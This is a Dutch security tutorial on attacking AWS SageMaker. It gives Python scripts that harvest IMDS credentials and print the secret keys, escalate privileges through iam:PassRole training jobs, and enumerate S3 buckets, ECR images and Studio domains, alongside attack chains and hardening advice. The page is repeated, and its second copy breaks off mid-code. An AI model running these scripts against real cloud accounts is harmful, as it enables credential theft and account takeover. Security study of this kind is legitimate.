Het aanvalsoppervlak van AWS SageMaker

Gevorderd13 min lezenBijgewerkt op 2026-03-13

Beveiligingsbeoordeling van AWS SageMaker -- exploitatie van IAM-rollen, misbruik van endpoints, aanvallen op notebookservers en manipulatie van trainingspipelines.

aws sagemaker cloud ml-platform

Overzicht van de SageMaker-architectuur

AWS SageMaker biedt beheerde diensten voor de volledige ML-levenscyclus: datalabeling, notebooks, training, modelhosting en MLOps-pipelines. Elke component heeft eigen vertrouwensgrenzen en IAM-vereisten.

Belangrijkste componenten en aanvalsoppervlakken

Component	IAM-principal	Opslag	Netwerk	Risiconiveau
Studio/Notebooks	Execution role	EFS/S3	VPC optioneel	Hoog
Training Jobs	Training role	S3 input/output	VPC optioneel	Hoog
Endpoints	Endpoint role	ECR/S3 model	Internetgericht	Kritiek
Pipelines	Pipeline role	S3 artifacts	VPC optioneel	Gemiddeld
Feature Store	Feature role	S3/Glue	VPC	Gemiddeld

Aanvalstechnieken

1. Exploitatie van de execution role

SageMaker notebook-instances draaien met een IAM execution role. Als de rol te veel rechten heeft -- een veelvoorkomende bevinding, aangezien data scientists tijdens het experimenteren toegang nodig hebben tot diverse AWS-diensten -- geeft het compromitteren van de notebook brede toegang. De beheerde policy AmazonSageMakerFullAccess, die vaak tijdens de installatie wordt gekoppeld, verleent rechten die veel verder gaan dan wat de meeste notebooks nodig hebben, waaronder toegang tot alle S3-buckets met sagemaker in de naam, ECR-repositories en CloudWatch-logs binnen het hele account.

import boto3
import requests
 
# Vanuit een SageMaker-notebook de execution role enumereren
sts = boto3.client('sts')
identity = sts.get_caller_identity()
print(f"Role ARN: {identity['Arn']}")
 
# Controleren wat de rol kan doen
iam = boto3.client('iam')
role_name = identity['Arn'].split('/')[-1]
 
# Gekoppelde policies opsommen
policies = iam.list_attached_role_policies(RoleName=role_name)
for policy in policies['AttachedPolicies']:
    print(f"Policy: {policy['PolicyName']}")
    # Policy-document ophalen om rechten te controleren
    version = iam.get_policy(PolicyArn=policy['PolicyArn'])['Policy']['DefaultVersionId']
    doc = iam.get_policy_version(PolicyArn=policy['PolicyArn'], VersionId=version)
    print(doc['PolicyVersion']['Document'])

Privilege-escalatie via role chaining

SageMaker-omgevingen omvatten vaak meerdere IAM-rollen: de execution role van de notebook, rollen voor trainingsjobs, endpoint-rollen en execution roles voor pipelines. Als de execution role rollen kan doorgeven aan andere SageMaker-resources (via iam:PassRole), kan een aanvaller privileges escaleren door een trainingsjob te starten met een rol die meer rechten heeft.

import boto3
import json
 
iam = boto3.client('iam')
sm = boto3.client('sagemaker')
sts = boto3.client('sts')
 
identity = sts.get_caller_identity()
current_role = identity['Arn'].split('/')[-1]
 
# Controleren of de rol andere rollen kan doorgeven
try:
    # Alle rollen in het account opsommen
    roles = iam.list_roles()['Roles']
    sagemaker_roles = [
        r for r in roles
        if 'sagemaker' in r['RoleName'].lower()
        or 'SageMaker' in json.dumps(r.get('AssumeRolePolicyDocument', {}))
    ]
 
    print(f"Current role: {current_role}")
    print(f"SageMaker-related roles found: {len(sagemaker_roles)}")
    for role in sagemaker_roles:
        print(f"  {role['RoleName']} - {role['Arn']}")
 
        # Controleren of deze rol meer rechten heeft
        attached = iam.list_attached_role_policies(
            RoleName=role['RoleName']
        )['AttachedPolicies']
        for policy in attached:
            print(f"    Policy: {policy['PolicyName']}")
 
except Exception as e:
    print(f"Cannot enumerate roles: {e}")
 
# Proberen een trainingsjob te maken met een rol die meer privileges heeft
def escalate_via_training_job(target_role_arn):
    """Een trainingsjob starten die credentials exfiltreert uit een
    rol met meer privileges."""
    sm.create_training_job(
        TrainingJobName='security-test-escalation',
        RoleArn=target_role_arn,  # De rol met meer privileges
        AlgorithmSpecification={
            'TrainingImage': '763104351884.dkr.ecr.us-east-1.amazonaws.com/'
                             'pytorch-training:2.0.0-cpu-py310',
            'TrainingInputMode': 'File'
        },
        ResourceConfig={
            'InstanceType': 'ml.m5.large',
            'InstanceCount': 1,
            'VolumeSizeInGB': 10
        },
        StoppingCondition={'MaxRuntimeInSeconds': 300},
        InputDataConfig=[{
            'ChannelName': 'training',
            'DataSource': {
                'S3DataSource': {
                    'S3DataType': 'S3Prefix',
                    'S3Uri': 's3://bucket/data/'
                }
            }
        }],
        OutputDataConfig={
            'S3OutputPath': 's3://bucket/output/'
        }
    )

2. IMDS-credentialoogst

SageMaker notebook-instances stellen de Instance Metadata Service beschikbaar. Oudere instances gebruiken standaard IMDSv1 (geen sessietoken vereist), waardoor credentialdiefstal triviaal wordt. Zelfs met IMDSv2 kan code die in de notebookcontext draait het vereiste PUT-verzoek uitvoeren om een sessietoken te verkrijgen.

# SageMaker-instances gebruiken standaard IMDS v1 (kan v2 zijn in nieuwere configs)
import requests
 
# Tijdelijke credentials ophalen uit de instance-metadata
role_name = requests.get(
    'http://169.254.169.254/latest/meta-data/iam/security-credentials/'
).text
creds = requests.get(
    f'http://169.254.169.254/latest/meta-data/iam/security-credentials/{role_name}'
).json()
 
print(f"AccessKeyId: {creds['AccessKeyId']}")
print(f"SecretAccessKey: {creds['SecretAccessKey']}")
print(f"Token: {creds['Token']}")

IMDSv2-credentialoogst

Wanneer IMDSv2 wordt afgedwongen, moet de aanvaller eerst een sessietoken verkrijgen. Dit is nog steeds mogelijk vanuit code die op de instance draait.

import requests
 
# IMDSv2 vereist eerst een PUT om een sessietoken te verkrijgen
token_resp = requests.put(
    'http://169.254.169.254/latest/api/token',
    headers={'X-aws-ec2-metadata-token-ttl-seconds': '21600'}
)
imds_token = token_resp.text
 
# Het token gebruiken om de metadata te benaderen
headers = {'X-aws-ec2-metadata-token': imds_token}
 
# Het instance-identity-document ophalen
identity = requests.get(
    'http://169.254.169.254/latest/dynamic/instance-identity/document',
    headers=headers
).json()
print(f"Region: {identity['region']}")
print(f"Account: {identity['accountId']}")
print(f"Instance: {identity['instanceId']}")
 
# Credentials ophalen
role_name = requests.get(
    'http://169.254.169.254/latest/meta-data/iam/security-credentials/',
    headers=headers
).text
creds = requests.get(
    f'http://169.254.169.254/latest/meta-data/iam/security-credentials/{role_name}',
    headers=headers
).json()
print(f"Access Key: {creds['AccessKeyId']}")
print(f"Expiration: {creds['Expiration']}")
 
# Ook user-data extraheren (kan initialisatiescripts met secrets bevatten)
user_data = requests.get(
    'http://169.254.169.254/latest/user-data',
    headers=headers
).text
print(f"User data length: {len(user_data)} bytes")
if user_data:
    # Controleren op veelvoorkomende secrets in user data
    for keyword in ['password', 'secret', 'token', 'key', 'credential']:
        if keyword.lower() in user_data.lower():
            print(f"  [!] User data may contain '{keyword}'")

3. Endpoint-enumeratie en -testen

SageMaker-endpoints leveren modelvoorspellingen en zijn vaak de meest blootgestelde component -- ze verwerken productieverkeer en kunnen toegankelijk zijn vanuit VPC's, andere AWS-accounts of zelfs vanaf internet via API Gateway.

import boto3
 
sm = boto3.client('sagemaker')
runtime = boto3.client('sagemaker-runtime')
 
# Alle endpoints opsommen
endpoints = sm.list_endpoints()['Endpoints']
for ep in endpoints:
    config = sm.describe_endpoint(EndpointName=ep['EndpointName'])
    print(f"Endpoint: {ep['EndpointName']}")
    print(f"  Status: {config['EndpointStatus']}")
    print(f"  Created: {config['CreationTime']}")
 
    # Aanroep proberen
    try:
        response = runtime.invoke_endpoint(
            EndpointName=ep['EndpointName'],
            ContentType='application/json',
            Body='{"inputs": "test"}'
        )
        print(f"  Response: {response['Body'].read()[:200]}")
    except Exception as e:
        print(f"  Error: {e}")

Diepgaande beveiligingsanalyse van endpoints

import boto3
import json
 
sm = boto3.client('sagemaker')
 
def analyze_endpoint_security(endpoint_name):
    """Uitgebreide beveiligingsbeoordeling van een endpoint."""
    # Endpoint-config ophalen
    endpoint = sm.describe_endpoint(EndpointName=endpoint_name)
    config_name = endpoint['EndpointConfigName']
    config = sm.describe_endpoint_config(EndpointConfigName=config_name)
 
    results = {"endpoint": endpoint_name, "findings": []}
 
    # VPC-configuratie controleren
    for variant in config['ProductionVariants']:
        model = sm.describe_model(ModelName=variant['ModelName'])
 
        # Controleren of het model in een VPC draait
        if 'VpcConfig' not in model:
            results["findings"].append({
                "severity": "HIGH",
                "finding": f"Model {variant['ModelName']} not in VPC"
            })
 
        # De execution role van het model controleren
        role_arn = model['ExecutionRoleArn']
        results["findings"].append({
            "severity": "INFO",
            "finding": f"Model role: {role_arn}"
        })
 
        # De bron van de container-image controleren
        container = model.get('PrimaryContainer', {})
        image = container.get('Image', 'Unknown')
        results["findings"].append({
            "severity": "INFO",
            "finding": f"Container image: {image}"
        })
 
        # Controleren op modeldata (S3-pad naar modelartefacten)
        model_data = container.get('ModelDataUrl', 'None')
        if model_data != 'None':
            results["findings"].append({
                "severity": "MEDIUM",
                "finding": f"Model artifacts at: {model_data}"
            })
 
    # Data-capture-configuratie controleren (kan inferentiedata lekken)
    if 'DataCaptureConfig' in config:
        capture = config['DataCaptureConfig']
        if capture.get('EnableCapture'):
            results["findings"].append({
                "severity": "MEDIUM",
                "finding": f"Data capture enabled -> {capture.get('DestinationS3Uri')}"
            })
 
    return results
 
# Analyse uitvoeren voor alle endpoints
for ep in sm.list_endpoints()['Endpoints']:
    analysis = analyze_endpoint_security(ep['EndpointName'])
    print(json.dumps(analysis, indent=2, default=str))

4. Exfiltratie van trainingsdata

SageMaker slaat trainingsdata, modelartefacten en pipeline-output op in S3. De standaard bucketnaamconventie (sagemaker-{region}-{account_id}) maakt ontdekking eenvoudig. Naast de standaardbucket verwijzen trainingsjobs naar S3-paden voor input en output die kunnen wijzen naar gevoelige data lakes.

# S3-buckets enumereren die door SageMaker worden gebruikt
s3 = boto3.client('s3')
buckets = s3.list_buckets()['Buckets']
sagemaker_buckets = [b for b in buckets if 'sagemaker' in b['Name'].lower()]
 
for bucket in sagemaker_buckets:
    print(f"\nBucket: {bucket['Name']}")
    objects = s3.list_objects_v2(Bucket=bucket['Name'], MaxKeys=20)
    for obj in objects.get('Contents', []):
        print(f"  {obj['Key']} ({obj['Size']} bytes)")

Trainingsdata extraheren uit de jobgeschiedenis

import boto3
 
sm = boto3.client('sagemaker')
s3 = boto3.client('s3')
 
# Recente trainingsjobs opsommen om datalocaties te vinden
jobs = sm.list_training_jobs(
    SortBy='CreationTime',
    SortOrder='Descending',
    MaxResults=20
)
 
for job_summary in jobs['TrainingJobSummaries']:
    job = sm.describe_training_job(
        TrainingJobName=job_summary['TrainingJobName']
    )
    print(f"\nJob: {job['TrainingJobName']}")
    print(f"  Status: {job['TrainingJobStatus']}")
    print(f"  Role: {job['RoleArn']}")
 
    # Locaties van invoerdata extraheren
    for channel in job.get('InputDataConfig', []):
        s3_uri = channel['DataSource']['S3DataSource']['S3Uri']
        print(f"  Input ({channel['ChannelName']}): {s3_uri}")
 
    # Uitvoerlocatie extraheren
    output_uri = job['OutputDataConfig']['S3OutputPath']
    print(f"  Output: {output_uri}")
 
    # Modelartefacten extraheren (het getrainde model)
    if 'ModelArtifacts' in job:
        model_uri = job['ModelArtifacts']['S3ModelArtifacts']
        print(f"  Model: {model_uri}")
 
    # Controleren op hyperparameters (kunnen secrets of API-sleutels bevatten)
    hyperparams = job.get('HyperParameters', {})
    for key, value in hyperparams.items():
        if any(kw in key.lower() for kw in
               ['key', 'secret', 'token', 'password', 'api']):
            print(f"  [!] Suspicious hyperparameter: {key}={value[:20]}...")

5. Aanvallen op ECR-container-images

SageMaker gebruikt Amazon ECR om container-images voor training en inferentie op te slaan. Het compromitteren van ECR-toegang maakt supply chain-aanvallen mogelijk waarbij legitieme images worden vervangen door versies met een backdoor die data exfiltreren of model-backdoors injecteren tijdens de training.

import boto3
import json
 
ecr = boto3.client('ecr')
 
# Alle repositories opsommen
repos = ecr.describe_repositories()['repositories']
ml_repos = [r for r in repos if any(
    kw in r['repositoryName'].lower()
    for kw in ['sagemaker', 'ml', 'model', 'inference', 'training']
)]
 
for repo in ml_repos:
    print(f"\nRepository: {repo['repositoryName']}")
    print(f"  URI: {repo['repositoryUri']}")
    print(f"  Created: {repo['createdAt']}")
 
    # Bevindingen van image-scan controleren
    images = ecr.list_images(
        repositoryName=repo['repositoryName'],
        maxResults=5
    )['imageIds']
 
    for image in images:
        if 'imageTag' in image:
            print(f"  Image: {image['imageTag']}")
            try:
                scan = ecr.describe_image_scan_findings(
                    repositoryName=repo['repositoryName'],
                    imageId=image
                )
                vulns = scan['imageScanFindings']['findingSeverityCounts']
                print(f"    Vulnerabilities: {json.dumps(vulns)}")
            except ecr.exceptions.ScanNotFoundException:
                print(f"    [!] No vulnerability scan results")
 
    # Repository-policy controleren (wie kan pushen/pullen)
    try:
        policy = ecr.get_repository_policy(
            repositoryName=repo['repositoryName']
        )
        policy_doc = json.loads(policy['policyText'])
        for stmt in policy_doc.get('Statement', []):
            print(f"  Policy: {stmt.get('Effect')} - "
                  f"{stmt.get('Principal', {})}")
    except ecr.exceptions.RepositoryPolicyNotFoundException:
        print(f"  No repository policy (default account access only)")

6. Exploitatie van SageMaker Studio-domeinen

SageMaker Studio organiseert gebruikersomgevingen in domeinen en gebruikersprofielen. Een gecompromitteerd Studio-domein kan het werk van alle gebruikers, gedeelde spaces en het onderliggende EFS-bestandssysteem dat notebooks en data opslaat, blootleggen.

import boto3
 
sm = boto3.client('sagemaker')
efs = boto3.client('efs')
 
# Studio-domeinen opsommen
domains = sm.list_domains()['Domains']
for domain in domains:
    detail = sm.describe_domain(DomainId=domain['DomainId'])
    print(f"\nDomain: {detail['DomainName']}")
    print(f"  Auth: {detail['AuthMode']}")
    print(f"  VPC: {detail.get('VpcId', 'No VPC')}")
    print(f"  EFS: {detail.get('HomeEfsFileSystemId', 'N/A')}")
 
    # De standaard execution role geldt voor alle gebruikers
    default_settings = detail.get('DefaultUserSettings', {})
    print(f"  Default role: {default_settings.get('ExecutionRole', 'N/A')}")
 
    # Gebruikersprofielen opsommen
    profiles = sm.list_user_profiles(DomainIdEquals=domain['DomainId'])
    for profile in profiles['UserProfiles']:
        user_detail = sm.describe_user_profile(
            DomainId=domain['DomainId'],
            UserProfileName=profile['UserProfileName']
        )
        user_role = user_detail.get('UserSettings', {}).get('ExecutionRole')
        print(f"  User: {profile['UserProfileName']} "
              f"(role: {user_role or 'uses default'})")
 
    # Controleren of het EFS toegankelijk is
    if 'HomeEfsFileSystemId' in detail:
        efs_id = detail['HomeEfsFileSystemId']
        try:
            fs = efs.describe_file_systems(FileSystemId=efs_id)
            print(f"  EFS size: {fs['FileSystems'][0]['SizeInBytes']['Value']} bytes")
            # Mount targets controleren op netwerkblootstelling
            mounts = efs.describe_mount_targets(FileSystemId=efs_id)
            for mt in mounts['MountTargets']:
                print(f"  EFS mount: {mt['IpAddress']} in {mt['SubnetId']}")
        except Exception as e:
            print(f"  EFS access error: {e}")

Checklist voor defensieve beoordeling

Controlegebied	Wat te verifiëren	Veelvoorkomende bevinding
IAM-rollen	Execution roles met minimale privileges per component	`AmazonSageMakerFullAccess` gekoppeld aan alle rollen
IMDS	IMDSv2 afgedwongen op notebook-instances	IMDSv1 nog steeds ingeschakeld (standaard op oudere instances)
Netwerk	VPC-isolatie voor notebooks, training en endpoints	Geen VPC-configuratie (standaard)
S3	Bucket-policies, encryptie, versiebeheer, access logging	Publieke of te ruime bucket-policies
ECR	Image-scanning, repository-policies, immutable tags	Geen vulnerability scanning geconfigureerd
Logging	CloudTrail, CloudWatch, logging van SageMaker Experiments	Onvolledige logging van SageMaker API-aanroepen
Encryptie	KMS-sleutels voor S3, EBS, EFS en inter-node training	Standaard door AWS beheerde sleutels (geen controle van de klant)
Endpoint	IAM-autorisatie, VPC-endpoints, resource-policies	Geen IAM-condities op endpoint-aanroep

Aanbevolen hardening

Vervang AmazonSageMakerFullAccess door aangepaste policies die beperkt zijn tot specifieke S3-paden, ECR-repositories en SageMaker-resources.
Dwing IMDSv2 af op alle notebook-instances door MinimumInstanceMetadataServiceVersion op 2 te zetten.
Plaats alle componenten in een VPC met private subnets en VPC-endpoints voor S3, ECR, SageMaker API en SageMaker Runtime.
Schakel S3-bucketversiebeheer en access logging in op alle SageMaker-gerelateerde buckets om ongeoorloofde toegang of wijziging te detecteren.
Gebruik aparte IAM-rollen voor notebooks, trainingsjobs en endpoints, elk beperkt tot alleen de resources die ze nodig hebben.
Schakel ECR-image-scanning in en dwing image-immutability af om supply chain-aanvallen te voorkomen.
Schakel CloudTrail-data-events in voor S3-buckets met trainingsdata en modelartefacten.
Gebruik SageMaker Model Cards en Model Registry om de herkomst van modellen bij te houden en ongeoorloofde modeldeployment te voorkomen.

Veelvoorkomende aanvalsketens

Keten 1: Van notebook tot volledige accountcompromittering

1. Initial access: Compromised data scientist credentials or malicious .ipynb file
2. IMDS credential harvesting from notebook instance
3. Enumerate IAM role permissions -- discover AmazonSageMakerFullAccess
4. List S3 buckets matching sagemaker-* pattern
5. Access training data, model artifacts, and pipeline outputs
6. Discover iam:PassRole permission in the execution role
7. Launch training job with a higher-privilege role
8. Use escalated role to access non-SageMaker resources (RDS, DynamoDB, etc.)

Keten 2: Vergiftiging van de model registry

1. Gain access to a SageMaker execution role with model registry permissions
2. Download the latest approved model from S3
3. Modify model artifact to include a backdoor (e.g., pickle-based RCE in PyTorch model)
4. Register the modified model as a new version in the model registry
5. If automatic deployment is configured, the backdoored model reaches production
6. Backdoored model executes attacker code on every inference request

Keten 3: Cross-account-pivot via een endpoint

1. Discover SageMaker endpoint with cross-account IAM trust
2. Invoke endpoint with crafted payloads to test for model vulnerabilities
3. If model inference container has outbound network access, use it as proxy
4. Leverage endpoint role's cross-account permissions to access resources
   in other AWS accounts within the organization

MITRE ATLAS-mapping voor SageMaker-aanvallen

Aanvalstechniek	ATLAS-ID	SageMaker-specifieke context
IMDS-credentialoogst	AML.TA0002 (Initial Access)	Execution roles van notebooks met brede S3/ECR-toegang
S3-trainingsdatatoegang	AML.T0000 (Search for Victim's Data)	Standaard `sagemaker-*` bucketnaamconventie vergemakkelijkt ontdekking
Endpoint-enumeratie	AML.T0002 (Active Scanning)	`sagemaker:ListEndpoints` onthult alle gedeployde modellen
Modelextractie via endpoint	AML.T0024 (Model Extraction)	Endpoint-aanroep met systematische query's
Manipulatie van ECR-image	AML.T0018 (Backdoor ML Model)	Inferentie-container-image in ECR vervangen
Vergiftiging van trainingsdata	AML.T0020 (Data Poisoning)	S3-trainingsdata wijzigen tussen pipeline-runs

Gerelateerde onderwerpen

Cloud AI-infrastructuur -- Cross-platformoverzicht
API-beveiliging -- Grondbeginselen van endpoint-beveiliging
Model-supply-chain -- Beveiliging van modelartefacten

Referenties

AWS SageMaker Security Documentation - Amazon Web Services (2024) - Official SageMaker security best practices
"Securing Machine Learning Workloads on AWS" - AWS Well-Architected ML Lens (2023) - ML security architecture guidance
CVE-2024-34073 - SageMaker notebook instance IMDS access control bypass
"Cloud Security Alliance AI Safety Initiative" - CSA (2024) - Industry guidance on securing cloud AI platforms

Knowledge Check

Waarom is IMDS-credentialoogst bijzonder gevaarlijk op SageMaker notebook-instances?

Het aanvalsoppervlak van AWS SageMaker

Gevorderd13 min lezenBijgewerkt op 2026-03-13

Beveiligingsbeoordeling van AWS SageMaker -- exploitatie van IAM-rollen, misbruik van endpoints, aanvallen op notebookservers en manipulatie van trainingspipelines.

aws sagemaker cloud ml-platform

Overzicht van de SageMaker-architectuur

Belangrijkste componenten en aanvalsoppervlakken

Component	IAM-principal	Opslag	Netwerk	Risiconiveau
Studio/Notebooks	Execution role	EFS/S3	VPC optioneel	Hoog
Training Jobs	Training role	S3 input/output	VPC optioneel	Hoog
Endpoints	Endpoint role	ECR/S3 model	Internetgericht	Kritiek
Pipelines	Pipeline role	S3 artifacts	VPC optioneel	Gemiddeld
Feature Store	Feature role	S3/Glue	VPC	Gemiddeld

Aanvalstechnieken

1. Exploitatie van de execution role

import boto3
import requests
 
# Vanuit een SageMaker-notebook de execution role enumereren
sts = boto3.client('sts')
identity = sts.get_caller_identity()
print(f"Role ARN: {identity['Arn']}")
 
# Controleren wat de rol kan doen
iam = boto3.client('iam')
role_name = identity['Arn'].split('/')[-1]
 
# Gekoppelde policies opsommen
policies = iam.list_attached_role_policies(RoleName=role_name)
for policy in policies['AttachedPolicies']:
    print(f"Policy: {policy['PolicyName']}")
    # Policy-document ophalen om rechten te controleren
    version = iam.get_policy(PolicyArn=policy['PolicyArn'])['Policy']['DefaultVersionId']
    doc = iam.get_policy_version(PolicyArn=policy['PolicyArn'], VersionId=version)
    print(doc['PolicyVersion']['Document'])

Privilege-escalatie via role chaining

import boto3
import json
 
iam = boto3.client('iam')
sm = boto3.client('sagemaker')
sts = boto3.client('sts')
 
identity = sts.get_caller_identity()
current_role = identity['Arn'].split('/')[-1]
 
# Controleren of de rol andere rollen kan doorgeven
try:
    # Alle rollen in het account opsommen
    roles = iam.list_roles()['Roles']
    sagemaker_roles = [
        r for r in roles
        if 'sagemaker' in r['RoleName'].lower()
        or 'SageMaker' in json.dumps(r.get('AssumeRolePolicyDocument', {}))
    ]
 
    print(f"Current role: {current_role}")
    print(f"SageMaker-related roles found: {len(sagemaker_roles)}")
    for role in sagemaker_roles:
        print(f"  {role['RoleName']} - {role['Arn']}")
 
        # Controleren of deze rol meer rechten heeft
        attached = iam.list_attached_role_policies(
            RoleName=role['RoleName']
        )['AttachedPolicies']
        for policy in attached:
            print(f"    Policy: {policy['PolicyName']}")
 
except Exception as e:
    print(f"Cannot enumerate roles: {e}")
 
# Proberen een trainingsjob te maken met een rol die meer privileges heeft
def escalate_via_training_job(target_role_arn):
    """Een trainingsjob starten die credentials exfiltreert uit een
    rol met meer privileges."""
    sm.create_training_job(
        TrainingJobName='security-test-escalation',
        RoleArn=target_role_arn,  # De rol met meer privileges
        AlgorithmSpecification={
            'TrainingImage': '763104351884.dkr.ecr.us-east-1.amazonaws.com/'
                             'pytorch-training:2.0.0-cpu-py310',
            'TrainingInputMode': 'File'
        },
        ResourceConfig={
            'InstanceType': 'ml.m5.large',
            'InstanceCount': 1,
            'VolumeSizeInGB': 10
        },
        StoppingCondition={'MaxRuntimeInSeconds': 300},
        InputDataConfig=[{
            'ChannelName': 'training',
            'DataSource': {
                'S3DataSource': {
                    'S3DataType': 'S3Prefix',
                    'S3Uri': 's3://bucket/data/'
                }
            }
        }],
        OutputDataConfig={
            'S3OutputPath': 's3://bucket/output/'
        }
    )

2. IMDS-credentialoogst

# SageMaker-instances gebruiken standaard IMDS v1 (kan v2 zijn in nieuwere configs)
import requests
 
# Tijdelijke credentials ophalen uit de instance-metadata
role_name = requests.get(
    'http://169.254.169.254/latest/meta-data/iam/security-credentials/'
).text
creds = requests.get(
    f'http://169.254.169.254/latest/meta-data/iam/security-credentials/{role_name}'
).json()
 
print(f"AccessKeyId: {creds['AccessKeyId']}")
print(f"SecretAccessKey: {creds['SecretAccessKey']}")
print(f"Token: {creds['Token']}")

IMDSv2-credentialoogst

Wanneer IMDSv2 wordt afgedwongen, moet de aanvaller eerst een sessietoken verkrijgen. Dit is nog steeds mogelijk vanuit code die op de instance draait.

import requests
 
# IMDSv2 vereist eerst een PUT om een sessietoken te verkrijgen
token_resp = requests.put(
    'http://169.254.169.254/latest/api/token',
    headers={'X-aws-ec2-metadata-token-ttl-seconds': '21600'}
)
imds_token = token_resp.text
 
# Het token gebruiken om de metadata te benaderen
headers = {'X-aws-ec2-metadata-token': imds_token}
 
# Het instance-identity-document ophalen
identity = requests.get(
    'http://169.254.169.254/latest/dynamic/instance-identity/document',
    headers=headers
).json()
print(f"Region: {identity['region']}")
print(f"Account: {identity['accountId']}")
print(f"Instance: {identity['instanceId']}")
 
# Credentials ophalen
role_name = requests.get(
    'http://169.254.169.254/latest/meta-data/iam/security-credentials/',
    headers=headers
).text
creds = requests.get(
    f'http://169.254.169.254/latest/meta-data/iam/security-credentials/{role_name}',
    headers=headers
).json()
print(f"Access Key: {creds['AccessKeyId']}")
print(f"Expiration: {creds['Expiration']}")
 
# Ook user-data extraheren (kan initialisatiescripts met secrets bevatten)
user_data = requests.get(
    'http://169.254.169.254/latest/user-data',
    headers=headers
).text
print(f"User data length: {len(user_data)} bytes")
if user_data:
    # Controleren op veelvoorkomende secrets in user data
    for keyword in ['password', 'secret', 'token', 'key', 'credential']:
        if keyword.lower() in user_data.lower():
            print(f"  [!] User data may contain '{keyword}'")

3. Endpoint-enumeratie en -testen

import boto3
 
sm = boto3.client('sagemaker')
runtime = boto3.client('sagemaker-runtime')
 
# Alle endpoints opsommen
endpoints = sm.list_endpoints()['Endpoints']
for ep in endpoints:
    config = sm.describe_endpoint(EndpointName=ep['EndpointName'])
    print(f"Endpoint: {ep['EndpointName']}")
    print(f"  Status: {config['EndpointStatus']}")
    print(f"  Created: {config['CreationTime']}")
 
    # Aanroep proberen
    try:
        response = runtime.invoke_endpoint(
            EndpointName=ep['EndpointName'],
            ContentType='application/json',
            Body='{"inputs": "test"}'
        )
        print(f"  Response: {response['Body'].read()[:200]}")
    except Exception as e:
        print(f"  Error: {e}")

Diepgaande beveiligingsanalyse van endpoints

import boto3
import json
 
sm = boto3.client('sagemaker')
 
def analyze_endpoint_security(endpoint_name):
    """Uitgebreide beveiligingsbeoordeling van een endpoint."""
    # Endpoint-config ophalen
    endpoint = sm.describe_endpoint(EndpointName=endpoint_name)
    config_name = endpoint['EndpointConfigName']
    config = sm.describe_endpoint_config(EndpointConfigName=config_name)
 
    results = {"endpoint": endpoint_name, "findings": []}
 
    # VPC-configuratie controleren
    for variant in config['ProductionVariants']:
        model = sm.describe_model(ModelName=variant['ModelName'])
 
        # Controleren of het model in een VPC draait
        if 'VpcConfig' not in model:
            results["findings"].append({
                "severity": "HIGH",
                "finding": f"Model {variant['ModelName']} not in VPC"
            })
 
        # De execution role van het model controleren
        role_arn = model['ExecutionRoleArn']
        results["findings"].append({
            "severity": "INFO",
            "finding": f"Model role: {role_arn}"
        })
 
        # De bron van de container-image controleren
        container = model.get('PrimaryContainer', {})
        image = container.get('Image', 'Unknown')
        results["findings"].append({
            "severity": "INFO",
            "finding": f"Container image: {image}"
        })
 
        # Controleren op modeldata (S3-pad naar modelartefacten)
        model_data = container.get('ModelDataUrl', 'None')
        if model_data != 'None':
            results["findings"].append({
                "severity": "MEDIUM",
                "finding": f"Model artifacts at: {model_data}"
            })
 
    # Data-capture-configuratie controleren (kan inferentiedata lekken)
    if 'DataCaptureConfig' in config:
        capture = config['DataCaptureConfig']
        if capture.get('EnableCapture'):
            results["findings"].append({
                "severity": "MEDIUM",
                "finding": f"Data capture enabled -> {capture.get('DestinationS3Uri')}"
            })
 
    return results
 
# Analyse uitvoeren voor alle endpoints
for ep in sm.list_endpoints()['Endpoints']:
    analysis = analyze_endpoint_security(ep['EndpointName'])
    print(json.dumps(analysis, indent=2, default=str))

4. Exfiltratie van trainingsdata

# S3-buckets enumereren die door SageMaker worden gebruikt
s3 = boto3.client('s3')
buckets = s3.list_buckets()['Buckets']
sagemaker_buckets = [b for b in buckets if 'sagemaker' in b['Name'].lower()]
 
for bucket in sagemaker_buckets:
    print(f"\nBucket: {bucket['Name']}")
    objects = s3.list_objects_v2(Bucket=bucket['Name'], MaxKeys=20)
    for obj in objects.get('Contents', []):
        print(f"  {obj['Key']} ({obj['Size']} bytes)")

Trainingsdata extraheren uit de jobgeschiedenis

import boto3
 
sm = boto3.client('sagemaker')
s3 = boto3.client('s3')
 
# Recente trainingsjobs opsommen om datalocaties te vinden
jobs = sm.list_training_jobs(
    SortBy='CreationTime',
    SortOrder='Descending',
    MaxResults=20
)
 
for job_summary in jobs['TrainingJobSummaries']:
    job = sm.describe_training_job(
        TrainingJobName=job_summary['TrainingJobName']
    )
    print(f"\nJob: {job['TrainingJobName']}")
    print(f"  Status: {job['TrainingJobStatus']}")
    print(f"  Role: {job['RoleArn']}")
 
    # Locaties van invoerdata extraheren
    for channel in job.get('InputDataConfig', []):
        s3_uri = channel['DataSource']['S3DataSource']['S3Uri']
        print(f"  Input ({channel['ChannelName']}): {s3_uri}")
 
    # Uitvoerlocatie extraheren
    output_uri = job['OutputDataConfig']['S3OutputPath']
    print(f"  Output: {output_uri}")
 
    # Modelartefacten extraheren (het getrainde model)
    if 'ModelArtifacts' in job:
        model_uri = job['ModelArtifacts']['S3ModelArtifacts']
        print(f"  Model: {model_uri}")
 
    # Controleren op hyperparameters (kunnen secrets of API-sleutels bevatten)
    hyperparams = job.get('HyperParameters', {})
    for key, value in hyperparams.items():
        if any(kw in key.lower() for kw in
               ['key', 'secret', 'token', 'password', 'api']):
            print(f"  [!] Suspicious hyperparameter: {key}={value[:20]}...")

5. Aanvallen op ECR-container-images

import boto3
import json
 
ecr = boto3.client('ecr')
 
# Alle repositories opsommen
repos = ecr.describe_repositories()['repositories']
ml_repos = [r for r in repos if any(
    kw in r['repositoryName'].lower()
    for kw in ['sagemaker', 'ml', 'model', 'inference', 'training']
)]
 
for repo in ml_repos:
    print(f"\nRepository: {repo['repositoryName']}")
    print(f"  URI: {repo['repositoryUri']}")
    print(f"  Created: {repo['createdAt']}")
 
    # Bevindingen van image-scan controleren
    images = ecr.list_images(
        repositoryName=repo['repositoryName'],
        maxResults=5
    )['imageIds']
 
    for image in images:
        if 'imageTag' in image:
            print(f"  Image: {image['imageTag']}")
            try:
                scan = ecr.describe_image_scan_findings(
                    repositoryName=repo['repositoryName'],
                    imageId=image
                )
                vulns = scan['imageScanFindings']['findingSeverityCounts']
                print(f"    Vulnerabilities: {json.dumps(vulns)}")
            except ecr.exceptions.ScanNotFoundException:
                print(f"    [!] No vulnerability scan results")
 
    # Repository-policy controleren (wie kan pushen/pullen)
    try:
        policy = ecr.get_repository_policy(
            repositoryName=repo['repositoryName']
        )
        policy_doc = json.loads(policy['policyText'])
        for stmt in policy_doc.get('Statement', []):
            print(f"  Policy: {stmt.get('Effect')} - "
